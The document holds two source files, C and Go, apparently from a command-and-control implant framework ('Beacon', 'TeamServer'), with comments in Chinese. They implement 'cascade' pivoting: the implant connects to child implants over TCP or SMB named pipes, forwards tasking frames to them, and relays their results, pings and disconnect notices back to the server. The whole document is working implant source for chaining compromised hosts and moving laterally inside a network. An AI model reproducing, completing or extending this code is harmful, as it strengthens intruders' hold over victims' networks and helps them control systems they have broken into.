File: C-Beacon/src/managers/cascade.c
#include "beacon_cascade_internal.h"

/* ===== 命令处理函数 ===== */

/* 处理 TCP 连接命令：解析参数后主动连接子通道 */
ByteBuf CascadeHandleConnectTcp(BeaconContext* ctx, Parser* parser)
{
    UINT32 argc;
    CHAR* child_id = NULL;
    CHAR* host = NULL;
    UINT32 port;
    CascadeIo io;
    CHAR hint[256];
    ByteBuf result;

    BbInit(&result);

    if (!ctx || !parser) return BbFromText("invalid cascade tcp request");
    argc = ParserU32(parser);
    if (argc < 2) return BbFromText("connect requires host and port");

    if (argc == 2) {
        host = ParserString(parser);
        port = ParserU32(parser);
    } else {
        child_id = ParserString(parser);
        host = ParserString(parser);
        port = ParserU32(parser);
    }
    if (parser->error[0]) {
        result = BbFromText(parser->error);
        goto cleanup;
    }

    if (!CascadeIoConnectTcp(host, (INT)port, ctx->profile.tcp_internal.connect_timeout_ms, &io)) {
        result = BbFromText("tcp child connect failed");
        goto cleanup;
    }

    snprintf(hint, sizeof(hint), "%s:%lu", host, (ULONG)port);
    result = CascadeRegisterChannel(ctx,
                                    (child_id && child_id[0]) ? child_id : hint,
                                    CASCADE_PROTOCOL_TCP, hint, &io);

cleanup:
    if (child_id) HeapFree(GetProcessHeap(), 0, child_id);
    if (host) HeapFree(GetProcessHeap(), 0, host);
    return result;
}

/* 处理 SMB 链接命令：解析参数后通过命名管道连接子通道 */
ByteBuf CascadeHandleLinkSmb(BeaconContext* ctx, Parser* parser)
{
    UINT32 argc;
    CHAR* child_id = NULL;
    CHAR* pipe = NULL;
    CascadeIo io;
    ByteBuf result;

    BbInit(&result);

    if (!ctx || !parser) return BbFromText("invalid cascade smb request");
    argc = ParserU32(parser);
    if (argc < 2) return BbFromText("link requires child_id and pipe path");

    child_id = ParserString(parser);
    pipe = ParserString(parser);
    if (parser->error[0]) {
        result = BbFromText(parser->error);
        goto cleanup;
    }

    if (!CascadeIoConnectPipe(pipe, ctx->profile.smb_internal.connect_timeout_ms, &io)) {
        result = BbFromText("smb child link failed");
        goto cleanup;
    }

    result = CascadeRegisterChannel(ctx, child_id, CASCADE_PROTOCOL_SMB, pipe, &io);

cleanup:
    HeapFree(GetProcessHeap(), 0, child_id);
    HeapFree(GetProcessHeap(), 0, pipe);
    return result;
}

/* 处理路由命令：将数据帧转发给指定子通道 */
ByteBuf CascadeHandleRoute(BeaconContext* ctx, Parser* parser)
{
    CHAR* child_id = NULL;
    ByteBuf blob;
    CascadeChannel* ch;
    BOOL ok;
    ByteBuf result;

    BbInit(&result);

    if (!ctx || !parser) return BbFromText("invalid cascade route request");

    child_id = ParserString(parser);
    blob = ParserBytes(parser);
    if (parser->error[0]) {
        BbFree(&blob);
        result = BbFromText(parser->error);
        goto cleanup;
    }

    EnterCriticalSection(&ctx->cascade.lock);
    ch = CascadeFindLocked(&ctx->cascade, child_id);
    LeaveCriticalSection(&ctx->cascade.lock);

    if (!ch) {
        BbFree(&blob);
        result = BbFromText("cascade child not found");
        goto cleanup;
    }

    ok = CascadeIoWriteFrame(&ch->io, CASCADE_FRAME_TASK, &blob);
    BbFree(&blob);
    if (!ok) {
        InterlockedExchange((LONG*)&ch->active, 0);
        CascadeQueueDead(&ctx->cascade, child_id, "route write failed");
        result = BbFromText("cascade route write failed");
        goto cleanup;
    }

    result = BbFromText("cascade route sent");

cleanup:
    HeapFree(GetProcessHeap(), 0, child_id);
    return result;
}

/* 处理关闭命令：发送 CLOSE 帧并断开指定子通道 */
ByteBuf CascadeHandleClose(BeaconContext* ctx, Parser* parser)
{
    CHAR* child_id = NULL;
    CascadeChannel* ch;
    ByteBuf empty;
    ByteBuf result;

    BbInit(&result);

    if (!ctx || !parser) return BbFromText("invalid cascade close request");
    child_id = ParserString(parser);
    if (parser->error[0]) {
        result = BbFromText(parser->error);
        goto cleanup;
    }

    EnterCriticalSection(&ctx->cascade.lock);
    ch = CascadeFindLocked(&ctx->cascade, child_id);
    LeaveCriticalSection(&ctx->cascade.lock);

    if (!ch) {
        result = BbFromText("cascade child not found");
        goto cleanup;
    }

    BbInit(&empty);
    CascadeIoWriteFrame(&ch->io, CASCADE_FRAME_CLOSE, &empty);
    InterlockedExchange((LONG*)&ch->active, 0);
    CascadeIoClose(&ch->io);
    result = BbFromText("cascade child closed");

cleanup:
    HeapFree(GetProcessHeap(), 0, child_id);
    return result;
}

/*
 * 同步关闭所有活跃子通道并入队 CASCADE_DEAD 通知。
 *
 * 在 exit 命令处理函数中、设置 should_exit 之前调用。
 * 这样 Dead 包会在当前 flush 周期的 flushCascade → flushOutbox
 * 路径中被取走并发送给 TeamServer，不会因主循环提前退出而丢失。
 *
 * 实现要点：
 *  1. 持锁将整个通道链表"摘走"，防止并发注册新通道干扰遍历；
 *  2. 释放锁后逐一关闭 io 并入队 Dead（避免持锁期间调用可能再次获锁的函数）；
 *  3. 不释放 CascadeChannel 对象本身，由 CascadeFree 在上下文销毁时统一清理。
 */
VOID CascadeShutdownAll(CascadeManager* cm)
{
    CascadeChannel* list;
    CascadeChannel* ch;
    const CHAR* reason;

    if (!cm) return;

    /* 持锁摘走整个链表，置空以阻止后续通道注册 */
    EnterCriticalSection(&cm->lock);
    list = cm->channels;
    cm->channels = NULL;
    LeaveCriticalSection(&cm->lock);

    /* 逐通道同步关闭并入队 Dead，CascadeQueueDead 内部自行持锁 */
    for (ch = list; ch; ch = ch->next) {
        InterlockedExchange((LONG*)&ch->active, 0);
        CascadeIoClose(&ch->io);
        reason = (ch->protocol == CASCADE_PROTOCOL_SMB) ? "smb pipe closed" : "tcp closed";
        CascadeQueueDead(cm, ch->child_id, reason);
    }
}

File: Go-Beacon/pkg/command/cascade.go
package command

import (
	"beacon/pkg/cascade"
	"beacon/pkg/profile"
	"beacon/pkg/utils/packet"
	"fmt"
	"net"
	"strings"
	"sync"
	"sync/atomic"
	"time"
)

const (
	cascadeConnectTimeout = 10 * time.Second
)

type CascadeChannel struct {
	ChildID  string
	Protocol uint32
	Hint     string
	Link     cascade.Link
	writeMu  sync.Mutex
	closed   atomic.Bool
}

func (ch *CascadeChannel) Close() {
	if ch == nil {
		return
	}
	if ch.closed.CompareAndSwap(false, true) && ch.Link != nil {
		_ = ch.Link.Close()
	}
}

func (ch *CascadeChannel) writeFrame(cmd uint16, body []byte) error {
	ch.writeMu.Lock()
	defer ch.writeMu.Unlock()
	return cascade.WriteFrame(ch.Link, cmd, body)
}

type CascadeManager struct {
	mu      sync.RWMutex
	chans   map[string]*CascadeChannel
	pending [][]byte
}

func NewCascadeManager() *CascadeManager {
	return &CascadeManager{
		chans: make(map[string]*CascadeChannel),
	}
}

func (cm *CascadeManager) Close() {
	if cm == nil {
		return
	}

	cm.mu.Lock()
	channels := cm.chans
	cm.chans = make(map[string]*CascadeChannel)
	cm.pending = nil
	cm.mu.Unlock()

	for _, ch := range channels {
		ch.Close()
	}
}

// ShutdownAll 关闭所有级联子链路，并同步将 CascadeDead 写入 pending，
// 使调用方能在退出前将 Dead 通知刷给服务端。
// 与 Close 的区别：直接入队 Dead 包，不依赖 pumpChannel goroutine 异步触发。
func (cm *CascadeManager) ShutdownAll() {
	if cm == nil {
		return
	}

	cm.mu.Lock()
	channels := cm.chans
	cm.chans = make(map[string]*CascadeChannel)
	cm.mu.Unlock()

	for _, ch := range channels {
		// 先标记 closed，pumpChannel 收到读错误后会直接 return，不再重复 queueDead
		ch.Close()
		cm.queueDead(ch.ChildID, cascadeClosedReason(ch.Protocol))
	}
}

func (cm *CascadeManager) GetPendingPackets() [][]byte {
	if cm == nil {
		return nil
	}

	cm.mu.Lock()
	defer cm.mu.Unlock()
	if len(cm.pending) == 0 {
		return nil
	}
	out := append([][]byte(nil), cm.pending...)
	cm.pending = nil
	return out
}

func (cm *CascadeManager) ConnectTCP(p *packet.Parser) ([]byte, error) {
	if cm == nil {
		return nil, fmt.Errorf("cascade manager is not initialized")
	}

	argCount := p.ParseInt32()
	if p.HasError() {
		return nil, p.Error()
	}
	if argCount < 2 {
		return packet.PackArray([]any{[]byte("connect requires host and port")})
	}

	var childID string
	var host string
	var port int

	if argCount == 2 {
		host = strings.TrimSpace(p.ParseString())
		port = int(p.ParseInt32())
	} else {
		childID = strings.TrimSpace(p.ParseString())
		host = strings.TrimSpace(p.ParseString())
		port = int(p.ParseInt32())
	}
	if p.HasError() {
		return nil, p.Error()
	}
	if host == "" || port <= 0 {
		return packet.PackArray([]any{[]byte("invalid cascade tcp request")})
	}

	hint := fmt.Sprintf("%s:%d", host, port)
	conn, err := net.DialTimeout("tcp", net.JoinHostPort(host, fmt.Sprintf("%d", port)), tcpCascadeConnectTimeout())
	if err != nil {
		return packet.PackArray([]any{[]byte("tcp child connect failed")})
	}

	return cm.registerChannel(childID, cascade.ProtocolTCP, "tcp", hint, conn)
}

func (cm *CascadeManager) LinkSMB(p *packet.Parser) ([]byte, error) {
	if cm == nil {
		return nil, fmt.Errorf("cascade manager is not initialized")
	}

	argCount := p.ParseInt32()
	if p.HasError() {
		return nil, p.Error()
	}
	if argCount < 2 {
		return packet.PackArray([]any{[]byte("link requires child_id and pipe path")})
	}

	childID := strings.TrimSpace(p.ParseString())
	pipePath := strings.TrimSpace(p.ParseString())
	if p.HasError() {
		return nil, p.Error()
	}
	if pipePath == "" {
		return packet.PackArray([]any{[]byte("invalid cascade smb request")})
	}

	link, err := cascade.DialSMB(pipePath, smbCascadeConnectTimeout())
	if err != nil {
		return packet.PackArray([]any{[]byte("smb child link failed")})
	}

	return cm.registerChannel(childID, cascade.ProtocolSMB, "smb", pipePath, link)
}

func (cm *CascadeManager) registerChannel(childID string, protocol uint32, protocolName, hint string, link cascade.Link) ([]byte, error) {
	helloCmd, helloBody, err := cascade.ReadFrame(link)
	if err != nil {
		_ = link.Close()
		return packet.PackArray([]any{[]byte("cascade child did not send HELLO")})
	}
	if helloCmd != cascade.FrameHello {
		_ = link.Close()
		return packet.PackArray([]any{[]byte("cascade child did not send HELLO")})
	}

	realChildID, heartbeat, err := parseCascadeHello(helloBody)
	if err != nil {
		_ = link.Close()
		return packet.PackArray([]any{[]byte("cascade child HELLO parse failed")})
	}
	if realChildID != "" {
		childID = realChildID
	}
	if childID == "" {
		childID = hint
	}

	ch := &CascadeChannel{
		ChildID:  childID,
		Protocol: protocol,
		Hint:     hint,
		Link:     link,
	}

	cm.mu.Lock()
	if old := cm.chans[ch.ChildID]; old != nil {
		delete(cm.chans, ch.ChildID)
		old.Close()
	}
	cm.chans[ch.ChildID] = ch
	cm.mu.Unlock()

	cm.queueOpen(ch.ChildID, protocolName, ch.Hint, heartbeat)
	go cm.pumpChannel(ch)

	return packet.PackArray([]any{[]byte("cascade child connected")})
}

func (cm *CascadeManager) Route(p *packet.Parser) ([]byte, error) {
	if cm == nil {
		return nil, fmt.Errorf("cascade manager is not initialized")
	}

	childID := strings.TrimSpace(p.ParseString())
	blob := p.ParseBytes()
	if p.HasError() {
		return nil, p.Error()
	}
	if childID == "" {
		return packet.PackArray([]any{[]byte("invalid cascade route request")})
	}

	ch, ok := cm.get(childID)
	if !ok {
		return packet.PackArray([]any{[]byte("cascade child not found")})
	}

	if err := ch.writeFrame(cascade.FrameTask, blob); err != nil {
		cm.remove(childID)
		ch.Close()
		cm.queueDead(childID, "route write failed")
		return packet.PackArray([]any{[]byte("cascade route write failed")})
	}
	return packet.PackArray([]any{[]byte("cascade route sent")})
}

func (cm *CascadeManager) CloseChannel(p *packet.Parser) ([]byte, error) {
	if cm == nil {
		return nil, fmt.Errorf("cascade manager is not initialized")
	}

	childID := strings.TrimSpace(p.ParseString())
	if p.HasError() {
		return nil, p.Error()
	}
	if childID == "" {
		return packet.PackArray([]any{[]byte("invalid cascade close request")})
	}

	ch, ok := cm.remove(childID)
	if !ok {
		return packet.PackArray([]any{[]byte("cascade child not found")})
	}

	_ = ch.writeFrame(cascade.FrameClose, nil)
	ch.Close()
	return packet.PackArray([]any{[]byte("cascade child closed")})
}

func (cm *CascadeManager) get(childID string) (*CascadeChannel, bool) {
	cm.mu.RLock()
	defer cm.mu.RUnlock()
	ch, ok := cm.chans[childID]
	return ch, ok
}

func (cm *CascadeManager) remove(childID string) (*CascadeChannel, bool) {
	cm.mu.Lock()
	defer cm.mu.Unlock()
	ch, ok := cm.chans[childID]
	if ok {
		delete(cm.chans, childID)
	}
	return ch, ok
}

func (cm *CascadeManager) queueFinal(commandID uint32, payload []byte) {
	if cm == nil {
		return
	}
	cm.mu.Lock()
	defer cm.mu.Unlock()
	cm.pending = append(cm.pending, packet.MakeFinalPacket(0, commandID, payload))
}

func (cm *CascadeManager) queueOpen(childID, protocol, hint string, heartbeat []byte) {
	body, _ := packet.PackArray([]any{
		childID,
		protocol,
		hint,
		packet.PackBytes(heartbeat),
	})
	cm.queueFinal(CommandCascadeOpen, body)
}

func (cm *CascadeManager) queueRead(childID string, data []byte) {
	body, _ := packet.PackArray([]any{
		childID,
		packet.PackBytes(data),
	})
	cm.queueFinal(CommandCascadeRead, body)
}

func (cm *CascadeManager) queuePing(childID string, data []byte) {
	body, _ := packet.PackArray([]any{
		childID,
		packet.PackBytes(data),
	})
	cm.queueFinal(CommandCascadePing, body)
}

func (cm *CascadeManager) queueDead(childID, reason string) {
	body, _ := packet.PackArray([]any{
		childID,
		reason,
	})
	cm.queueFinal(CommandCascadeDead, body)
}

func (cm *CascadeManager) pumpChannel(ch *CascadeChannel) {
	for {
		cmd, body, err := cascade.ReadFrame(ch.Link)
		if err != nil {
			if ch.closed.Load() {
				return
			}
			cm.remove(ch.ChildID)
			ch.Close()
			cm.queueDead(ch.ChildID, cascadeClosedReason(ch.Protocol))
			return
		}

		switch cmd {
		case cascade.FrameResult:
			cm.queueRead(ch.ChildID, body)
		case cascade.FramePing:
			cm.queuePing(ch.ChildID, body)
		case cascade.FrameClose:
			cm.remove(ch.ChildID)
			ch.Close()
			return
		default:
		}
	}
}

func cascadeClosedReason(protocol uint32) string {
	if protocol == cascade.ProtocolSMB {
		return "pipe closed"
	}
	return "tcp closed"
}

func tcpCascadeConnectTimeout() time.Duration {
	return profileTimeout(profile.GlobalProfile.TCPInternal.ConnectTimeoutMS)
}

func smbCascadeConnectTimeout() time.Duration {
	return profileTimeout(profile.GlobalProfile.SMBInternal.ConnectTimeoutMS)
}

func profileTimeout(ms int) time.Duration {
	if ms <= 0 {
		return cascadeConnectTimeout
	}
	return time.Duration(ms) * time.Millisecond
}

func parseCascadeHello(body []byte) (string, []byte, error) {
	p := packet.CreateParser(body)
	childID := p.ParseString()
	heartbeat := p.ParseBytes()
	if p.HasError() {
		return "", nil, p.Error()
	}
	return childID, heartbeat, nil
}
